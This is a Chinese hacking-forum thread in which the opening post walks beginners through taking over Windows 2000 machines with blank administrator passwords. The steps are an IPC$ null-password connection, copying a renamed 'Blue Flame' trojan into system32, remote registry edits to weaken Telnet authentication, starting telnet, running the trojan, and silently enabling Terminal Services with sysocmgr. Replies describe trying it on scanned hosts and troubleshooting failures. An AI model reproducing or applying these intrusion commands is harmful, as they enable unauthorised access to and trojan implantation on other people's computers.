|
 | 作者: clown [clown]
 论坛用户 |
登录 |
| 谨以此文献给像我一样的菜鸟们,愿我们一起成长,报效祖国, 废话少话开始吧 操作系统:2000 扫描器:流光或X-SCAN等 再来一个木马我用的是蓝色火焰 假设我们现在已扫描出一台有弱口令的机器,用户名是: ADMINISTRATOR 口令为:空 IP为:121.0.0.1 第一步:在命令提示符下输入:net use \\121.0.0.1\ipc$ "" /user:"administrator"成功后继续。 第二步:复制蓝色火焰的服务器端过去,我把服务器端重命名为 kernet.exe,假设服务器端在C盘根目录下,在命令提示下输入 c:\>copy kernet.exe \\121.0.0.1\admin$\systme32成功后继 续。不要关闭窗口。 第三步:开始---运行里输入regedit打开注册表,注册表菜单-- 连接网络注册表成功后,再121.0.0.1下找到以下键值: HEEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0下 的NTLM键,将缺省的值"2"修改为"1"或者"0"。如果你想知道这 台机器是服务器版还是专业版,可以查以下键值: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Pro ductOptions]右边窗口ProductType键值="ServerNT就是服务器 版,ProductType键值="winnt"就是专业版(是服务器版可以为 它装上终端服务,那我们就可用图形控制它了,专业版不行,等 一下咱们远程登陆成功后才能装) 第四步:开始----程序----管理工具有----计算机管理体制---- 操作----连接到另一台计算机输入121.0.0.1成功后在121.0.0.1 下双击服务和应用程序---双击服务---再双击右窗口telnet启动 它,确定。告诉大家连接注册表和启动它的telnet服务时会有些 慢,大家不要心紧。 第五步:在命令提示符下输入 telnet 121.0.0.1会你输入用户 名和密码,我们输入 administrator回车,回车。成功登录后进 入它装2000的盘如d盘,输入 d: 回车,cd winnt 回车 , cd system32回车,kernet.exe 这样就启动了木马。如果你想为它 装终端服务的话输入 :c:\>query user 这个工具需要安装终端服务. 这样就进一步确定了组件没有被安装.如果返回: USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME >w1 console 0 运行中 . 2002-1-12 22:5 \\类似这样的信息,可能组件就已安装. 好!都清楚了,可以开始安装了. --------------------------------------------------- C:\>dir c:\sysoc.inf /s //检查INF文件的位置 c:\WINNT\inf 的目录 2000-01-10 20:00 3,770 sysoc.inf 1 个文件 3,770 字节 ----------------------------------------------------- C:\> dir c:\sysocmgr.* /s //检查组件安装程序 c:\WINNT\system32 的目录 2000-01-10 20:00 42,768 sysocmgr.exe 1 个文件 42,768 字节 ----------------------------------------------------- c:\>echo [Components] > c:\wawa c:\>echo TSEnable = on >> c:\wawa //这是建立无人参与的安装参数 c:\>type c:\wawa [Components] TSEnable = on //检查参数文件 ------------------------------------------------------ c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q ----------------------------------------------------- 这一条就是真正安装组件的命令. 以上这条命令没有加/R参数,主机在安装完后自动重起. 如若加了/R参数主机就不会重起. 如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时 , 3389终端服务就已经开启.你就可以连上去了. 安装终端服务这段我是载抄wawa 的文章。 写的不好,请大家愿谅,我也只会这些,以后还望高手多多指点 |
| 地主 发表时间: 05/01 01:34 |
 | 回复: aa11 [aa11]  论坛用户 |
登录 |
|
圣婴兄, 好久不见啊~ |
| B1层 发表时间: 05/01 03:03 |
| 回复: aa11 [aa11] 论坛用户 |
登录 |
|
文章早就看过, 但没实践过~ 既然又贴出来了就试试嘛~ 扫了个弱口令, 空连接, 远程注册表, 远程计算机管理~ 开了23端口, telnet上去, 却有个怪事, administrator输完后, 提示输入密码,由于是空口令, 敲回车, 拷, 猛敲一阵都没反映~~~ 真的是怪事啊~ 还有些奇怪问题~ copy东西不过, 但用20cn扫描之ipc可以同步植入~ 但程序运行失败, 流光种植者种上去了~ 但telnet上去时, 刚连接上去, 就与主机断开了连接~ 可能是对方做了设置吧?? |
| B2层 发表时间: 05/01 04:47 |
| 回复: aa11 [aa11] 论坛用户 |
登录 |
|
开3389这段不行哦~ 我自己的电脑没开3389 我照上面的做后, 有反映, 不过它要我放入光盘哦~~ 那还开得了啊?/ |
| B3层 发表时间: 05/01 06:47 |
 | 回复: lukaifeng [lukaifeng] 论坛用户 |
登录 |
|
我用流光扫描了一台开着139的主机,得到了管理员的密码 IPC也连接成功了,但是复制文件怎么不行啊! |
| B4层 发表时间: 05/01 08:35 |
| 回复: aa11 [aa11] 论坛用户 |
登录 |
|
在服务里启动Telnet时, 在ip无法启动telnet服务. 错误1053:服务并未及时响应启动或控制请求~ 这是什么原因?? |
| B5层 发表时间: 05/05 21:26 |
| 回复: clown [clown] 论坛用户 |
登录 |
|
有是时候网速也是关键~! |
| B6层 发表时间: 05/06 03:28 |
| 回复: aa11 [aa11] 论坛用户 |
登录 |
|
在服务里启动Telnet时, 在ip无法启动telnet服务. 错误1053:服务并未及时响应启动或控制请求~ 这是什么原因?? 这个我觉得与网速挂不上关系吧~ 在局域网内, 快得很~ |
| B7层 发表时间: 05/06 13:26 |
| 回复: cuihua [cuihua]  论坛用户 |
登录 |
|
不错 适合在学校里用 |
| B8层 发表时间: 05/06 18:07 |
| 回复: clown [clown] 论坛用户 |
登录 |
|
那可能就是管理员禁止了~! |
| B9层 发表时间: 05/10 01:54 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 送给像我这样的菜鸟们!